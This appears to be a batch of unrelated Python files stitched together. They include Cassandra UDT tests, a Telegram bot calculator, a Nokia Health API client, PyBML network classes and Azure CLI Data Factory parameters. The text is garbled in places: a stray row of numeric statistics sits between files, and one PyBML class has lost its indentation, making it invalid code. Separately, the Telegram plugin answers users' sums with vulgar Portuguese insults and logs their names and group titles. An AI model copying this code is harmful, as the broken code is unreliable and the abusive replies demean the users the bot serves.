
        # create the seed udt
        s.execute("CREATE TYPE depth_0 (age int, name text)")

        # create the nested udts
        for i in range(MAX_NESTING_DEPTH):
            s.execute("CREATE TYPE depth_{} (value frozen<depth_{}>)".format(i + 1, i))

        # create a table with multiple sizes of nested udts
        # no need for all nested types, only a spot-checked few and the largest one
        s.execute("CREATE TABLE mytable ("
                  "k int PRIMARY KEY, "
                  "v_0 frozen<depth_0>, "
                  "v_1 frozen<depth_1>, "
                  "v_2 frozen<depth_2>, "
                  "v_3 frozen<depth_3>, "
                  "v_{0} frozen<depth_{0}>)".format(MAX_NESTING_DEPTH))

        # create the udt container
        udts = []

        # create and register the seed udt type, using a namedtuple name
        # ('level_0') that differs from the CQL type name ('depth_0')
        udt = namedtuple('level_0', ('age', 'name'))
        udts.append(udt)
        c.register_user_type("different_namedtuples", "depth_0", udts[0])

        # create and register the nested udt types
        for i in range(MAX_NESTING_DEPTH):
            udt = namedtuple('level_{}'.format(i + 1), ('value',))
            udts.append(udt)
            c.register_user_type("different_namedtuples", "depth_{}".format(i + 1), udts[i + 1])

        # verify inserts and reads
        for i in (0, 1, 2, 3, MAX_NESTING_DEPTH):
            # create udt
            udt = self.nested_udt_helper(udts, i)

            # write udt
            s.execute("INSERT INTO mytable (k, v_%s) VALUES (0, %s)", (i, udt))

            # verify udt was written and read correctly
            result = s.execute("SELECT v_%s FROM mytable WHERE k=0", (i,))[0]
            self.assertEqual(udt, result['v_%s' % i])

        c.shutdown()
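The docstring above suggests collapsing the three nested-UDT tests into one helper. One piece that is identical in all three is building the chain of namedtuple classes; a hypothetical shared builder (the name `build_nested_udt_classes` is ours, not the test suite's):

```python
from collections import namedtuple

def build_nested_udt_classes(max_depth, prefix='depth'):
    # hypothetical helper: builds the seed class plus one wrapper class per
    # nesting level, exactly as the three tests above do by hand
    udts = [namedtuple('{}_0'.format(prefix), ('age', 'name'))]
    for i in range(1, max_depth + 1):
        udts.append(namedtuple('{}_{}'.format(prefix, i), ('value',)))
    return udts

udts = build_nested_udt_classes(3)
assert [u.__name__ for u in udts] == ['depth_0', 'depth_1', 'depth_2', 'depth_3']
assert udts[1]._fields == ('value',)
```

The namedtuple name and the CQL type name could then vary independently, covering the `level_*` variant as well.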

    def test_non_existing_types(self):
        c = Cluster(protocol_version=PROTOCOL_VERSION)
        c.connect()
        User = namedtuple('user', ('age', 'name'))
        self.assertRaises(UserTypeDoesNotExist, c.register_user_type, "some_bad_keyspace", "user", User)
        self.assertRaises(UserTypeDoesNotExist, c.register_user_type, "system", "user", User)
        c.shutdown()

    def test_primitive_datatypes(self):
        """
        Test for inserting each of the DATA_TYPE_PRIMITIVES into a UDT.
        """
        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()

        # create keyspace
        s.execute("""
            CREATE KEYSPACE test_primitive_datatypes
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
            """)
        s.set_keyspace("test_primitive_datatypes")

        # create UDT
        alpha_type_list = []
        start_index = ord('a')
        for i, datatype in enumerate(DATA_TYPE_PRIMITIVES):
            alpha_type_list.append("{0} {1}".format(chr(start_index + i), datatype))

        s.execute("""
            CREATE TYPE alldatatypes ({0})
            """.format(', '.join(alpha_type_list)))

        s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<alldatatypes>)")

        # register UDT
        alphabet_list = []
        for i in range(ord('a'), ord('a') + len(DATA_TYPE_PRIMITIVES)):
            alphabet_list.append('{}'.format(chr(i)))
        Alldatatypes = namedtuple("alldatatypes", alphabet_list)
        c.register_user_type("test_primitive_datatypes", "alldatatypes", Alldatatypes)

        # insert UDT data
        params = []
        for datatype in DATA_TYPE_PRIMITIVES:
            params.append(get_sample(datatype))

        insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
        s.execute(insert, (0, Alldatatypes(*params)))

        # retrieve and verify data
        results = s.execute("SELECT * FROM mytable")
        self.assertEqual(1, len(results))

        row = results[0].b
        for expected, actual in zip(params, row):
            self.assertEqual(expected, actual)

        c.shutdown()
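The loop above names the UDT fields alphabetically: the first primitive type becomes column `a`, the second `b`, and so on. With a reduced placeholder list (the real `DATA_TYPE_PRIMITIVES` is longer):

```python
primitives = ['int', 'text', 'uuid']  # placeholders for DATA_TYPE_PRIMITIVES
columns = ', '.join(
    '{0} {1}'.format(chr(ord('a') + i), t) for i, t in enumerate(primitives)
)
assert columns == 'a int, b text, c uuid'
```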

    def test_nonprimitive_datatypes(self):
        """
        Test for inserting each DATA_TYPE_NON_PRIMITIVE collection of the
        DATA_TYPE_PRIMITIVES into a UDT.
        """
        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()

        # create keyspace
        s.execute("""
            CREATE KEYSPACE test_nonprimitive_datatypes
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
            """)
        s.set_keyspace("test_nonprimitive_datatypes")

        # create UDT
        alpha_type_list = []
        start_index = ord('a')
        for i, nonprim_datatype in enumerate(DATA_TYPE_NON_PRIMITIVE_NAMES):
            for j, datatype in enumerate(DATA_TYPE_PRIMITIVES):
                if nonprim_datatype == "map":
                    type_string = "{0}_{1} {2}<{3}, {3}>".format(chr(start_index + i), chr(start_index + j),
                                                                 nonprim_datatype, datatype)
                elif nonprim_datatype == "tuple":
                    type_string = "{0}_{1} frozen<{2}<{3}>>".format(chr(start_index + i), chr(start_index + j),
                                                                    nonprim_datatype, datatype)
                else:
                    type_string = "{0}_{1} {2}<{3}>".format(chr(start_index + i), chr(start_index + j),
                                                            nonprim_datatype, datatype)
                alpha_type_list.append(type_string)

        s.execute("""
            CREATE TYPE alldatatypes ({0})
            """.format(', '.join(alpha_type_list)))

        s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<alldatatypes>)")

        # register UDT
        alphabet_list = []
        for i in range(ord('a'), ord('a') + len(DATA_TYPE_NON_PRIMITIVE_NAMES)):
            for j in range(ord('a'), ord('a') + len(DATA_TYPE_PRIMITIVES)):
                alphabet_list.append('{0}_{1}'.format(chr(i), chr(j)))
        Alldatatypes = namedtuple("alldatatypes", alphabet_list)
        c.register_user_type("test_nonprimitive_datatypes", "alldatatypes", Alldatatypes)

        # insert UDT data
        params = []
        for nonprim_datatype in DATA_TYPE_NON_PRIMITIVE_NAMES:
            for datatype in DATA_TYPE_PRIMITIVES:
                params.append(get_nonprim_sample(nonprim_datatype, datatype))

        insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
        s.execute(insert, (0, Alldatatypes(*params)))

        # retrieve and verify data
        results = s.execute("SELECT * FROM mytable")
        self.assertEqual(1, len(results))

        row = results[0].b
        for expected, actual in zip(params, row):
            self.assertEqual(expected, actual)

        c.shutdown()

# ===== build/lib/federal_holiday/__init__.py (mmcelhan/federalholiday, MIT) =====
from .federal_holiday import holiday_name, is_federal_holiday, is_weekend, is_working_day, is_off_day

# ===== plugins/calculadora.py (gorpo/manicomio_bot_heroku, MIT) =====
import html
import re
import random
import amanobot
import aiohttp
from amanobot.exception import TelegramError
import time

from config import bot, sudoers, logs, bot_username
from utils import send_to_dogbin, send_to_hastebin


async def calculadora(msg):
    if msg.get('text'):
        if '+' in msg['text']:
            n1 = int(msg['text'].split('+')[0])
            n2 = int(msg['text'].split('+')[1])
            calc = n1 + n2
            print('Usuario {} solicitou a calculadora {}+{}={} '.format(msg['from']['first_name'], n1, n2, calc))
            log = '\nUsuario {} solicitou a calculadora {}+{}={} --> Grupo: {} --> Data/hora:{}'.format(
                msg['from']['first_name'], n1, n2, calc, msg['chat']['title'], time.ctime())
            arquivo = open('logs/calc.txt', 'a')
            arquivo.write(log)
            arquivo.close()
            await bot.sendMessage(msg['chat']['id'],
                                  '`Sua soma {}+{}={} {} seu pau no cu!`'.format(n1, n2, calc, msg['from']['first_name']),
                                  'markdown',
                                  reply_to_message_id=msg['message_id'])
            return True
        if '-' in msg['text']:
            n1 = int(msg['text'].split('-')[0])
            n2 = int(msg['text'].split('-')[1])
            calc = n1 - n2
            print('Usuario {} solicitou a calculadora {}-{}={}'.format(msg['from']['first_name'], n1, n2, calc))
            log = '\nUsuario {} solicitou a calculadora {}-{}={} --> Grupo: {} --> Data/hora:{}'.format(
                msg['from']['first_name'], n1, n2, calc, msg['chat']['title'], time.ctime())
            arquivo = open('logs/calc.txt', 'a')
            arquivo.write(log)
            arquivo.close()
            await bot.sendMessage(msg['chat']['id'],
                                  '`Sua subtração {}-{}={} {}seu filho da puta!`'.format(n1, n2, calc, msg['from']['first_name']),
                                  'markdown',
                                  reply_to_message_id=msg['message_id'])
            return True
        if '*' in msg['text']:
            n1 = int(msg['text'].split('*')[0])
            n2 = int(msg['text'].split('*')[1])
            calc = n1 * n2
            print('Usuario {} solicitou a calculadora {}*{}={}'.format(msg['from']['first_name'], n1, n2, calc))
            log = '\nUsuario {} solicitou a calculadora {}*{}={} --> Grupo: {} --> Data/hora:{}'.format(
                msg['from']['first_name'], n1, n2, calc, msg['chat']['title'], time.ctime())
            arquivo = open('logs/calc.txt', 'a')
            arquivo.write(log)
            arquivo.close()
            await bot.sendMessage(msg['chat']['id'],
                                  '`Sua multiplicação {}*{}={} {} seu arrombado do caralho!`'.format(n1, n2, calc, msg['from']['first_name']),
                                  'markdown',
                                  reply_to_message_id=msg['message_id'])
            return True
        # the original condition checked for the substring 'div' but split on '/';
        # checking for '/' keeps the condition consistent with the split below
        if '/' in msg['text']:
            n1 = int(msg['text'].split('/')[0])
            n2 = int(msg['text'].split('/')[1])
            calc = n1 / n2
            print('Usuario {} solicitou a calculadora {}/{}={}'.format(msg['from']['first_name'], n1, n2, calc))
            log = '\nUsuario {} solicitou a calculadora {}/{}={} --> Grupo: {} --> Data/hora:{}'.format(
                msg['from']['first_name'], n1, n2, calc, msg['chat']['title'], time.ctime())
            arquivo = open('logs/calc.txt', 'a')
            arquivo.write(log)
            arquivo.close()
            await bot.sendMessage(msg['chat']['id'],
                                  '`Sua divisão {}/{}={} {} seu lixo`'.format(n1, n2, calc, msg['from']['first_name']),
                                  'markdown',
                                  reply_to_message_id=msg['message_id'])
            return True

# ===== client.py (a-r-i/nokiahealth_py, MIT) =====
import requests

def get_accesstoken(client_id, client_secret, code, redirect_uri):
    url = "https://account.health.nokia.com/oauth2/token"
    payload = {
        "grant_type": "authorization_code",
        "client_id": client_id,
        "client_secret": client_secret,
        "code": code,
        "redirect_uri": redirect_uri
    }
    r = requests.post(url, data=payload)
    return r.json()


def refresh_accesstoken(client_id, client_secret, refresh_token):
    url = "https://account.health.nokia.com/oauth2/token"
    payload = {
        "grant_type": "refresh_token",
        "client_id": client_id,
        "client_secret": client_secret,
        "refresh_token": refresh_token
    }
    r = requests.post(url, data=payload)
    return r.json()


def get_sleep(access_token, startdate, enddate):
    url = "https://api.health.nokia.com/v2/sleep?action=get"
    payload = {
        "access_token": access_token,
        "startdate": startdate,  # specified as a UNIX timestamp
        "enddate": enddate  # specified as a UNIX timestamp
    }
    r = requests.get(url, params=payload)
    return r.json()


def get_summary(access_token, startdateymd, enddateymd):
    url = "https://api.health.nokia.com/v2/sleep?action=getsummary"
    payload = {
        "access_token": access_token,
        "startdateymd": startdateymd,  # specified in YYYY-MM-DD format
        "enddateymd": enddateymd  # specified in YYYY-MM-DD format
    }
    r = requests.get(url, params=payload)
    return r.json()


def get_meas(access_token, startdate, enddate):
    url = "https://api.health.nokia.com/measure?action=getmeas"
    payload = {
        "access_token": access_token,
        "startdate": startdate,  # specified as a UNIX timestamp
        "enddate": enddate  # specified as a UNIX timestamp
    }
    r = requests.get(url, params=payload)
    return r.json()
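`get_sleep` and `get_meas` expect UNIX timestamps while `get_summary` takes `YYYY-MM-DD` strings. A small conversion helper (hypothetical, not part of this module) can bridge the two, assuming UTC midnight:

```python
from datetime import datetime, timezone

def ymd_to_unix(ymd):
    # convert a 'YYYY-MM-DD' string (UTC midnight) to the UNIX timestamp
    # format expected by the startdate/enddate parameters above
    dt = datetime.strptime(ymd, '%Y-%m-%d').replace(tzinfo=timezone.utc)
    return int(dt.timestamp())

assert ymd_to_unix('1970-01-01') == 0
assert ymd_to_unix('1970-01-02') == 86400
```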

# ===== pxolly/models/callback/__init__.py (lordralinc/pxolly_api, MIT) =====
from .get_settings import CallbackGetSettings

# ===== boml/setup_model/meta_feat_v2.py (bmlsoc/PyBML, MIT) =====
# MIT License
# Copyright (c) 2020 Yaohua Liu
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
The base class in setup_model to encapsulate Residual Block for meta-feature-based methods.
"""
from collections import OrderedDict
import tensorflow as tf
from tensorflow.contrib import layers as tcl
import boml.extension
from boml.setup_model import network_utils
from boml.setup_model.network import BOMLNet
class BOMLNetMiniMetaFeatV2(BOMLNet):
def __init__(
self,
_input,
name="BOMLNetMiniMetaFeatV2",
outer_param_dict=OrderedDict(),
dim_output=-1,
model_param_dict=OrderedDict(),
task_parameter=OrderedDict(),
use_t=False,
use_warp=False,
reuse=False,
outer_method="Reverse",
):
"""
:param _input: original input
:param dim_output: dimension of output
:param name: scope of meta-learner
:param outer_param_dict: dictionary of outer parameters
:param model_param_dict:dictonary of model parameters for specific algorithms such t-layer or warp-layer
:param task_parameter: dictionary of task-specific parameters or temporary values of task-specific parameters
:param use_t: Boolean, whether to use t-layer for neural network construction
:param use_warp: Boolean, whether to use warp-layer for neural network construction
:param outer_method: the name of outer method
:param reuse: Boolean, whether to reuse the parameters
"""
self.var_coll = boml.extension.METAPARAMETERS_COLLECTIONS
self.task_paramter = task_parameter
self.outer_method = outer_method
self.dim_output = dim_output
self.use_t = use_t
self.use_warp = use_warp
super().__init__(
_input=_input,
outer_param_dict=outer_param_dict,
model_param_dict=model_param_dict,
name=name,
reuse=reuse,
)
self.betas = self.filter_vars("beta")
self.moving_means = self.filter_vars("moving_mean")
self.moving_variances = self.filter_vars("moving_variance")
if not reuse:
boml.extension.remove_from_collection(
boml.extension.GraphKeys.MODEL_VARIABLES,
*self.moving_means,
*self.moving_variances
)
boml.extension.remove_from_collection(
boml.extension.GraphKeys.METAPARAMETERS,
*self.moving_means,
*self.moving_variances
)
print(name, "MODEL CREATED")

    def _forward(self):
        """
        _forward() uses defined convolutional neural networks with initial input
        :return:
        """

        def residual_block(x, n_filters):
            skip_c = tcl.conv2d(x, n_filters, 1, activation_fn=None)

            def conv_block(xx):
                out = tcl.conv2d(
                    xx,
                    n_filters,
                    3,
                    activation_fn=None,
                    normalizer_fn=tcl.batch_norm,
                    variables_collections=self.var_coll,
                )
                return network_utils.leaky_relu(out, 0.1)

            out = x
            for _ in range(3):
                out = conv_block(out)
            add = tf.add(skip_c, out)
            return tf.nn.max_pool(add, [1, 2, 2, 1], [1, 2, 2, 1], "SAME")

        self + residual_block(self.out, 64)
        self + residual_block(self.out, 96)
        self + residual_block(self.out, 128)
        self + residual_block(self.out, 256)
        self + tcl.conv2d(self.out, 2048, 1, variables_collections=self.var_coll)
        self + tf.nn.avg_pool(self.out, [1, 6, 6, 1], [1, 6, 6, 1], "VALID")
        self + tcl.conv2d(self.out, 512, 1, variables_collections=self.var_coll)
        self + tf.reshape(self.out, (-1, 512))

    def re_forward(self, new_input=None):
        """
        reuses defined convolutional networks with new input and updates the output results
        :param new_input: new input with same shape as the old one
        :return: updated instance of BOMLNet
        """
        return BOMLNetMiniMetaFeatV2(
            _input=new_input if new_input is not None else self.layers[0],
            model_param_dict=self.model_param_dict,
            name=self.name,
            dim_output=self.dim_output,
            outer_param_dict=self.outer_param_dict,
            reuse=tf.AUTO_REUSE,
            outer_method=self.outer_method,
            use_t=self.use_t,
        )


class BOMLNetOmniglotMetaFeatV2(BOMLNet):
    def __init__(
        self,
        _input,
        name="BOMLNetOmniglotMetaFeatV2",
        outer_param_dict=OrderedDict(),
        dim_output=-1,
        model_param_dict=OrderedDict(),
        use_t=False,
        use_warp=False,
        reuse=False,
        outer_method="Reverse",
    ):
        """
        :param _input: original input
        :param dim_output: dimension of output
        :param name: scope of meta-learner
        :param outer_param_dict: dictionary of outer parameters
        :param model_param_dict: dictionary of model parameters for specific algorithms such as t-layer or warp-layer
        :param use_t: Boolean, whether to use t-layer for neural network construction
        :param use_warp: Boolean, whether to use warp-layer for neural network construction
        :param outer_method: the name of outer method
        :param reuse: Boolean, whether to reuse the parameters
        """
        self.var_coll = boml.extension.METAPARAMETERS_COLLECTIONS
        self.outer_method = outer_method
        self.dim_output = dim_output
        self.use_t = use_t
        self.use_warp = use_warp
        super().__init__(
            _input=_input,
            outer_param_dict=outer_param_dict,
            model_param_dict=model_param_dict,
            name=name,
            reuse=reuse,
        )
        self.betas = self.filter_vars("beta")
        self.moving_means = self.filter_vars("moving_mean")
        self.moving_variances = self.filter_vars("moving_variance")

        if not reuse:
            boml.extension.remove_from_collection(
                boml.extension.GraphKeys.MODEL_VARIABLES,
                *self.moving_means,
                *self.moving_variances
            )
            boml.extension.remove_from_collection(
                boml.extension.GraphKeys.METAPARAMETERS,
                *self.moving_means,
                *self.moving_variances
            )
            print(name, "MODEL CREATED")

    def _forward(self):
        """
        _forward() uses defined convolutional neural networks with initial input
        :return:
        """

        def residual_block(x, n_filters):
            skip_c = tcl.conv2d(x, n_filters, 1, activation_fn=None)

            def conv_block(xx):
                out = tcl.conv2d(
                    xx,
                    n_filters,
                    3,
                    activation_fn=None,
                    normalizer_fn=tcl.batch_norm,
                    variables_collections=self.var_coll,
                )
                return network_utils.leaky_relu(out, 0.1)

            out = x
            for _ in range(3):
                out = conv_block(out)
            add = tf.add(skip_c, out)
            return tf.nn.max_pool(add, [1, 2, 2, 1], [1, 2, 2, 1], "SAME")

        self + residual_block(self.out, 64)
        self + residual_block(self.out, 96)
        self + tcl.conv2d(self.out, 2048, 1, variables_collections=self.var_coll)
        self + tf.nn.avg_pool(self.out, [1, 6, 6, 1], [1, 6, 6, 1], "VALID")
        self + tcl.conv2d(self.out, 512, 1, variables_collections=self.var_coll)
        self + tf.reshape(self.out, (-1, 512))

    def re_forward(self, new_input=None, task_parameter=OrderedDict()):
        """
        reuses defined convolutional networks with new input and updates the output results
        :param new_input: new input with same shape as the old one
        :param task_parameter: the dictionary of task-specific parameters
        :return: updated instance of BOMLNet
        """
        return BOMLNetOmniglotMetaFeatV2(
            new_input if new_input is not None else self.layers[0],
            model_param_dict=self.model_param_dict,
            name=self.name,
            dim_output=self.dim_output,
            outer_param_dict=self.outer_param_dict,
            reuse=tf.AUTO_REUSE,
            use_t=self.use_t,
            outer_method=self.outer_method,
        )
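Each `residual_block` halves the spatial resolution with a stride-2 'SAME' max pool. Assuming the usual 84x84 mini-ImageNet input (an assumption; the input size is not stated in this file), the four blocks in `BOMLNetMiniMetaFeatV2` leave a 6x6 feature map, which is why the average pool uses a 6x6 window:

```python
import math

def pooled_size(size, n_blocks):
    # stride-2 pooling with 'SAME' padding rounds the size up at each step
    for _ in range(n_blocks):
        size = math.ceil(size / 2)
    return size

# 84 -> 42 -> 21 -> 11 -> 6 after the four residual blocks
assert pooled_size(84, 4) == 6
```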

# ===== test_project/tests/fixtures/__init__.py (wishmaestro/drf-fat-models, MIT) =====
from .customers import *
from .orders import *
| 15.666667 | 24 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 25 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
# File: flow/scenarios/traffic_light_grid.py (SHITIANYU-hue/flow, MIT license)
"""Pending deprecation file.
To view the actual content, go to: flow/networks/traffic_light_grid.py
"""
from flow.utils.flow_warnings import deprecated
from flow.networks.traffic_light_grid import TrafficLightGridNetwork
from flow.networks.traffic_light_grid import ADDITIONAL_NET_PARAMS # noqa: F401


@deprecated('flow.scenarios.traffic_light_grid',
'flow.networks.traffic_light_grid.TrafficLightGridNetwork')
class TrafficLightGridScenario(TrafficLightGridNetwork):
"""See parent class."""
pass
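The `@deprecated(old_path, new_path)` decorator above keeps the old import path working while steering users to the new one. A minimal sketch of how such a decorator can be built (a hypothetical reimplementation, not flow's actual code, and applied to a function rather than a class for brevity):

```python
# Minimal deprecation decorator: warn with old -> new path on each call.
import functools
import warnings


def deprecated(old_path, new_path):
    def decorator(obj):
        @functools.wraps(obj)
        def wrapper(*args, **kwargs):
            warnings.warn(
                '{} is deprecated; use {} instead.'.format(old_path, new_path),
                PendingDeprecationWarning,
            )
            return obj(*args, **kwargs)
        return wrapper
    return decorator


@deprecated('old.module.make_thing', 'new.module.make_thing')
def make_thing():
    return 'thing'


with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter('always')
    assert make_thing() == 'thing'   # still works, but warns
    assert any(issubclass(w.category, PendingDeprecationWarning) for w in caught)
```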
# File: src/datafactory/azext_datafactory/generated/_params.py (haroonf/azure-cli-extensions, MIT license)
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_three_state_flag,
get_enum_type,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import (
get_default_location_from_resource_group,
validate_file_or_dict
)
from azext_datafactory.action import (
AddFactoryVstsConfiguration,
AddFactoryGitHubConfiguration,
AddFolder,
AddFilters,
AddOrderBy
)
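The `load_arguments` function that follows registers per-command parameter metadata through scoped `argument_context` blocks. A hypothetical stand-in for that pattern (none of the real azure.cli machinery, which resolves scopes against a command table; this only records which `c.argument(...)` settings belong to which command scope):

```python
# Toy registry mimicking the argument_context / c.argument(...) pattern.
from contextlib import contextmanager


class ArgRegistry:
    def __init__(self):
        self.args = {}       # command scope -> {dest: settings}
        self._scope = None

    @contextmanager
    def argument_context(self, scope):
        """Scope subsequent argument() calls to one command."""
        self._scope = scope
        try:
            yield self
        finally:
            self._scope = None

    def argument(self, dest, **settings):
        self.args.setdefault(self._scope, {})[dest] = settings


reg = ArgRegistry()
with reg.argument_context('datafactory show') as c:
    c.argument('factory_name', options_list=['--name', '-n'],
               help='The factory name.')

assert reg.args['datafactory show']['factory_name']['help'] == 'The factory name.'
```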


def load_arguments(self, _):
with self.argument_context('datafactory list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('datafactory show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('if_none_match', type=str, help='ETag of the factory entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str,
help='The factory name.')
c.argument('if_match', type=str, help='ETag of the factory entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('location', arg_type=get_location_type(self.cli_ctx), required=False,
validator=get_default_location_from_resource_group)
c.argument('tags', tags_type)
c.argument('factory_vsts_configuration', action=AddFactoryVstsConfiguration, nargs='+', help='Factory\'s VSTS '
'repo information.', arg_group='RepoConfiguration')
c.argument('factory_git_hub_configuration', action=AddFactoryGitHubConfiguration, nargs='+', help='Factory\'s '
'GitHub repo information.', arg_group='RepoConfiguration')
c.argument('global_parameters', type=validate_file_or_dict, help='List of parameters for factory. Expected '
'value: json-string/json-file/@json-file.')
with self.argument_context('datafactory update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('tags', tags_type)
with self.argument_context('datafactory delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
with self.argument_context('datafactory configure-factory-repo') as c:
c.argument('location', arg_type=get_location_type(self.cli_ctx), id_part='name')
c.argument('factory_resource_id', type=str, help='The factory resource id.')
c.argument('factory_vsts_configuration', action=AddFactoryVstsConfiguration, nargs='+', help='Factory\'s VSTS '
'repo information.', arg_group='RepoConfiguration')
c.argument('factory_git_hub_configuration', action=AddFactoryGitHubConfiguration, nargs='+', help='Factory\'s '
'GitHub repo information.', arg_group='RepoConfiguration')
with self.argument_context('datafactory get-data-plane-access') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('permissions', type=str, help='The string with permissions for Data Plane access. Currently only '
'\'r\' is supported which grants read only access.')
c.argument('access_resource_path', type=str, help='The resource path to get access relative to factory. '
'Currently only empty string is supported which corresponds to the factory resource.')
c.argument('profile_name', type=str, help='The name of the profile. Currently only the default is supported. '
'The default value is DefaultProfile.')
c.argument('start_time', type=str, help='Start time for the token. If not specified the current time will be '
'used.')
c.argument('expire_time', type=str, help='Expiration time for the token. Maximum duration for the token is '
'eight hours and by default the token will expire in eight hours.')
with self.argument_context('datafactory get-git-hub-access-token') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('git_hub_access_code', type=str, help='GitHub access code.')
c.argument('git_hub_client_id', type=str, help='GitHub application client ID.')
c.argument('git_hub_access_token_base_url', type=str, help='GitHub access token base URL.')
with self.argument_context('datafactory integration-runtime list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory integration-runtime show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the integration runtime entity. Should only be specified '
'for get. If the ETag matches the existing entity tag, or if * was provided, then no content will '
'be returned.')
with self.argument_context('datafactory integration-runtime linked-integration-runtime create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.')
c.argument('name', type=str, help='The name of the linked integration runtime.')
c.argument('subscription_id', type=str, help='The ID of the subscription that the linked integration runtime '
'belongs to.')
c.argument('data_factory_name', type=str, help='The name of the data factory that the linked integration '
'runtime belongs to.')
c.argument('location', arg_type=get_location_type(self.cli_ctx), required=False,
validator=get_default_location_from_resource_group)
with self.argument_context('datafactory integration-runtime managed create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.')
c.argument('if_match', type=str, help='ETag of the integration runtime entity. Should only be specified for '
'update, for which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Integration runtime description.')
c.argument('compute_properties', type=validate_file_or_dict, help='The compute resource for managed '
'integration runtime. Expected value: json-string/json-file/@json-file.', arg_group='Type '
'Properties')
c.argument('ssis_properties', type=validate_file_or_dict, help='SSIS properties for managed integration '
'runtime. Expected value: json-string/json-file/@json-file.', arg_group='Type Properties')
with self.argument_context('datafactory integration-runtime self-hosted create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.')
c.argument('if_match', type=str, help='ETag of the integration runtime entity. Should only be specified for '
'update, for which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Integration runtime description.')
c.argument('linked_info', type=validate_file_or_dict, help='The base definition of a linked integration '
'runtime. Expected value: json-string/json-file/@json-file.', arg_group='Type Properties')
with self.argument_context('datafactory integration-runtime update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('auto_update', arg_type=get_enum_type(['On', 'Off']), help='Enables or disables the auto-update '
'feature of the self-hosted integration runtime. See '
'https://go.microsoft.com/fwlink/?linkid=854189.')
